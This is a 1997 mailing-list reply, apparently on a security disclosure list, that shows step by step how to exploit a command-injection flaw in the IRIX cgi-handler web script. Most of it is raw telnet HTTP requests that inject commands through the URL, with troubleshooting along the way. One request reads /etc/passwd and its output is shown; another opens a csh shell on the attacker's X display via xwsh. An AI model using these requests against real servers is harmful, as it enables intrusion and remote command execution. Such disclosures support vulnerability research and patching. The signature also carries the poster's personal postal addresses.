Re: CPSR 7: IRIX WWW Server

Thomas Walter (balu@STUDST.FH-MUENSTER.DE)
Thu, 24 Jul 1997 17:51:56 +0200

Hiho...

[Corinne Posse Relaeses wrote]
> Quite a while ago, Razvan Dragomirescu (drazvan@kappa.ro) released a
> report on the default cgi-handler scripts that ship with IRIX systems
> with web servers, and some other web server programs. Just like with
> the phf bug, with the cgi-handler bug a malicious user could start
> an xterm from the server machine on their own system.
>
> Example:
>
> telnet www.highly.respectable.bank.com 80
> Trying 300.300.300.1...
> Connected to www.highly.respectable.bank.com
> Escape character is '^]'.
> GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
>
> Please note the format of the "GET" query. The above assumes xwsh is
> in the
> PATH somewhere, and the "space" between "xwsh" and "-display" sould be
> a TAB.

I've got some problems while trying that...
First it seems, that the xwsh was not in the path so I tried to call
xwsh with a given path (note that all whitespaces after GET
/cgi-bin/handler/ must be Tabs...):

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

That opened the xwsh window... But there was only one error-message in
the first line:

/usr/sbin/xwsh: Permission denied: can't start command

Hm - What could that be? Doesn't matter - Lets see what I can do with
other commands... (Remember the tabs...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download
UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
[... I wont give you that ;) ...]
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
[... and again some more ...]
Connection closed by foreign host.

Hm - a shadowed passwd... was my first thought... Lets see If I can get
the shadow... [As above] - Didnt work. So It seems that the WWWserver
was not running as root (what a pity ;). If it does not run as root - it
usually runs as nobody. And what can we see above? Nobody got the shell
/dev/null - thats why my xwsh was not able to start a command. Next Try
was to give xwsh the command that it should start... (And again: Tabs! -
and of course everything in one line...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

And voila! - What else do you want? Any other programs to start? Just
try...

Brgds
Balu

--
                                                            /'^'\
Please note: english is not my mother tongue               ( o o )
-------------------------------------------------------oOOO--(_)--OOOo
E-Mail: balu@studst.fh-muenster.de
Snail Mail: Thomas Walter
            Wemhoefer Stiege 10a, 48565 Burgsteinfurt   .oooO
or          Broxtermannstr.12, 49082 Osnabrueck, GERMANY(   )   Oooo.
---------------------------------------------------------\ (----(   )-
                                                          \_)    ) /
                                                                (_/